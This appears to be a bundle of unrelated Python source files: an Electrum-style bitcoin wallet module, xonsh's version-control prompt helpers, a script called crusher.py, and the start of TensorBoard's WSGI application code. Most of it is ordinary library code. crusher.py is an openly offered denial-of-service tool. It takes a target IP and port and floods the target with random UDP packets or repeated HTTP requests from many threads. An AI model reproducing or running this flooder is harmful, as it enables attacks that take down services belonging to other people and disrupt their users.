with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
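# Illustrative sketch (not part of the wallet API): synchronize_sequence() above
# implements the classic gap-limit scan -- keep deriving addresses until the
# last `limit` addresses in the sequence are all unused. The toy function below
# reproduces that loop with plain callables; `derive` stands in for
# derive_pubkeys()/pubkeys_to_address() and `is_used` for address_is_old().
def _gap_limit_scan_example(derive, is_used, limit=20):
    addresses = []
    while True:
        if len(addresses) < limit:
            addresses.append(derive(len(addresses)))
            continue
        if any(is_used(a) for a in addresses[-limit:]):
            addresses.append(derive(len(addresses)))
        else:
            break
    return addresses
# For example, _gap_limit_scan_example(lambda n: 'addr%d' % n,
# lambda a: a == 'addr1', limit=3) stops after deriving addr0..addr4, i.e. once
# three consecutive unused addresses follow the last used one.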
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return STO_EV_USER_PW
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
        return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
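# A minimal usage sketch for the factory above (illustrative only: the wallet
# file path is hypothetical, and encryption/error handling is omitted):
#
#   storage = WalletStorage('/path/to/wallet_file')   # must already exist
#   wallet = Wallet(storage)            # returns the concrete wallet subclass
#   wallet.start_threads(network)       # begin synchronizing when online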
def create_new_wallet(*, path, passphrase=None, password=None,
encrypt_file=True, seed_type=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
if seed_type == 'electrum':
seed = mnemo.Mnemonic_Electrum('en').make_seed()
elif seed_type in [None, "bip39"]:
seed = mnemo.make_bip39_words('english')
seed_type = "bip39"
else:
raise keystore.InvalidSeed(
f"Seed type {seed_type} not supported for new wallet creation"
)
k = keystore.from_seed(seed, passphrase, seed_type=seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif mnemo.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
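# Illustrative sketch (not part of the library): creating a fresh BIP39 wallet
# file with the helper above. The path and password here are hypothetical, and
# create_new_wallet() refuses to overwrite an existing file.
def _example_create_wallet(path='/tmp/example_wallet', password='correct horse'):
    d = create_new_wallet(path=path, password=password, seed_type='bip39')
    print(d['msg'])   # reminder to back up the seed phrase
    return d['wallet'], d['seed']
# restore_wallet_from_text() follows the same pattern but accepts a seed phrase,
# master key, address list or private-key list, plus the `config` argument.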
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
branches = xt.decode_bytes(
subprocess.check_output(
["git", "branch"], env=denv, stderr=subprocess.DEVNULL
)
).splitlines()
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
for branch in branches:
if not branch.startswith("* "):
continue
elif branch.endswith(")"):
branch = branch.split()[-1][:-1]
else:
branch = branch.split()[-1]
q.put(branch)
break
else:
q.put(None)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
# branch = RE_REMOVE_ANSI.sub("", branch or "")
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
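# The helper pair above shows the timeout pattern used throughout this module:
# run the subprocess call in a worker thread, wait at most $VC_BRANCH_TIMEOUT
# seconds via join(), then poll the queue with get_nowait() so a slow repository
# never blocks prompt rendering. A stripped-down, self-contained sketch of the
# same idea (the function name and defaults are illustrative, not xonsh API):
def _timeboxed_command_example(cmd=("git", "branch"), timeout=0.1):
    q = queue.Queue()
    def worker():
        try:
            q.put(subprocess.check_output(cmd, stderr=subprocess.DEVNULL))
        except Exception:
            q.put(None)
    t = threading.Thread(target=worker)
    t.start()
    t.join(timeout=timeout)
    try:
        return q.get_nowait()  # raw bytes on success, None on failure
    except queue.Empty:
        return None            # worker did not finish within the timeout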
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
    return None if not in a repo or if the branch lookup timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = q.get_nowait()
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = os.path.sep.join([root, ".hg", "branch"])
if os.path.exists(branch_path):
with open(branch_path, "r") as branch_file:
branch = branch_file.read()
else:
branch = "default"
else:
branch = ""
# add bookmark, if we can
bookmark_path = os.path.sep.join([root, ".hg", "bookmarks.current"])
if os.path.exists(bookmark_path):
with open(bookmark_path, "r") as bookmark_file:
active_bookmark = bookmark_file.read()
if env.get("VC_HG_SHOW_BRANCH") is True:
branch = "{0}, {1}".format(
*(b.strip(os.linesep) for b in (branch, active_bookmark))
)
else:
branch = active_bookmark.strip(os.linesep)
else:
branch = branch.strip(os.linesep)
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
cmds = builtins.__xonsh__.commands_cache
# check for binary only once
if cmds.is_empty():
has_git = bool(cmds.locate_binary("git", ignore_alias=True))
has_hg = bool(cmds.locate_binary("hg", ignore_alias=True))
else:
has_git = bool(cmds.lazy_locate_binary("git", ignore_alias=True))
has_hg = bool(cmds.lazy_locate_binary("hg", ignore_alias=True))
if has_git:
branch = get_git_branch()
if not branch and has_hg:
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
status = None
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "status", "--porcelain"]
if include_untracked:
cmd.append("--untracked-files=normal")
else:
cmd.append("--untracked-files=no")
status = subprocess.check_output(cmd, stderr=subprocess.DEVNULL, env=denv)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
if status is not None:
return q.put(bool(status))
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
cmds = builtins.__xonsh__.commands_cache
if cmds.lazy_locate_binary("git", ignore_alias=True):
dwd = git_dirty_working_directory()
if cmds.lazy_locate_binary("hg", ignore_alias=True) and dwd is None:
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
    not be determined, and green if it is clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
    not be determined, and green if it is clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
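# Example (an assumption, not verified against any particular xonsh version): if
# current_branch and branch_color above are exposed as the {curr_branch} and
# {branch_color} prompt fields, a prompt such as
#
#   $PROMPT = '{cwd} {branch_color}{curr_branch}{RESET} $ '
#
# shows the branch name colored by the dirty/clean state computed here.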
|
crusher.py
|
import stuff.banner
import argparse
import sys
import threading
import random
import socket
import time
# Arguments #
parser = argparse.ArgumentParser(
prog="Crusher",
description="A Powerful, Modern DDoS Attack Tool",
epilog="Copyright (c) 2020, Paxv28, All rights reserved."
)
parser.add_argument(
"-t",
"--target",
type=str,
metavar="<IP>",
help="Set Target IP"
)
parser.add_argument(
"-p",
"--port",
type=int,
metavar="<PORT>",
help="Set Target Port"
)
parser.add_argument(
"-th",
"--threads",
type=int,
default=50,
metavar="<THREADS>",
help="Set Threads Num | Default 50"
)
parser.add_argument(
"-m",
"--method",
metavar="<TCP/HTTP/UDP>",
help="Set Attack Method"
)
args = parser.parse_args()
method = str(args.method).upper()
threads = args.threads
target = args.target
port = args.port
# Argument End #
def main():
if method == 'UDP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
try:
time.sleep(10)
except KeyboardInterrupt:
print("[!] Ctrl + C Pressed / Exting...")
sys.exit(0)
th = threading.Thread(target=udp)
th.start()
except Exception as err:
print("Error: \n{err}")
break
else:
continue
elif method == 'TCP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
time.sleep(10)
th = threading.Thread(target=tcp)
th.start()
except Exception as err:
print("Error: \n{err}")
break
elif method == 'HTTP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
time.sleep(10)
th = threading.Thread(target=http)
th.start()
except Exception as err:
print("Error:\n{err}")
break
else:
continue
def udp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = random._urandom(1024)
while True:
try:
s.sendto(packet, (target, port))
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break2
sys.exit(0)
def tcp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = random._urandom(1024)
while True:
try:
s.sendto(packet, (target, port))
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break
sys.exit(0)
def http():
fake_ip = "182.21.20.32" # Don't make you anonymous
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break
sys.exit(0)
if not target or not method or not port:
parser.print_help()
# sys.exit()
else:
main()
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
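# Rough usage sketch for the helper above (illustrative only; `flags` normally
# comes from TensorBoard's CLI parser, and types.SimpleNamespace merely stands
# in for that namespace here):
def _tensor_size_guidance_example():
  from types import SimpleNamespace
  flags = SimpleNamespace(samples_per_plugin='scalars=500,images=0')
  guidance = tensor_size_guidance_from_flags(flags)
  # guidance now maps 'scalars' -> 500 and 'images' -> 0, while every other
  # plugin keeps its DEFAULT_TENSOR_SIZE_GUIDANCE value.
  return guidance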
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugins, which can be provided as TBPlugin subclasses
or TBLoader instances or subclasses.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
      path_prefix: A prefix of the URL path under which TensorBoard is served
        (optional, defaults to '').
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
